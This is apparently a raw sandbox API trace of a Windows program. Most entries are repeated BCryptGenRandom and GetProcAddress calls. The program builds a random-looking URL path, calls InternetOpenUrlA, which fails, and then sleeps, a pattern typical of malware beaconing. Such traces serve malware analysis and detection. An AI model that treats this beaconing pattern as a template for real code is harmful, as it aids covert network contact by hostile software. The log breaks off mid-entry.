0x7ffc5bcc36b0 [0267.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.218] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.218] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.218] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.221] GetProcessHeap () returned 0x440000 [0267.221] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0267.222] lstrcpyA (in: lpString1=0x472b10, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0267.222] lstrcatA (in: lpString1="\x04", lpString2="/6U0b5ijnUed7cnoxgtPr/1ms2Hqgsdl5lc3uk03ml4TjcM4a3Sjakf0i7n3h/" | out: lpString1="\x04/6U0b5ijnUed7cnoxgtPr/1ms2Hqgsdl5lc3uk03ml4TjcM4a3Sjakf0i7n3h/") returned="\x04/6U0b5ijnUed7cnoxgtPr/1ms2Hqgsdl5lc3uk03ml4TjcM4a3Sjakf0i7n3h/" [0267.222] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0267.222] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/6U0b5ijnUed7cnoxgtPr/1ms2Hqgsdl5lc3uk03ml4TjcM4a3Sjakf0i7n3h/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0267.222] GetProcessHeap () returned 0x440000 [0267.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0267.222] GetProcessHeap () returned 0x440000 [0267.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1a8b0 | out: hHeap=0x440000) returned 1 [0267.222] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0267.223] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0267.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0267.223] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0267.223] Sleep (dwMilliseconds=0x12078) [0267.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0267.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0267.861] GetProcessHeap () returned 0x440000 [0267.861] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b3a0 [0267.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0267.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b3a1, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a1b3a1) returned 0x0 [0267.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0267.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0267.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0267.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b3cb, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a1b3cb) returned 0x0 [0268.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0268.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.042] GetProcAddress (hModule=0x7ffc5bcc0000, 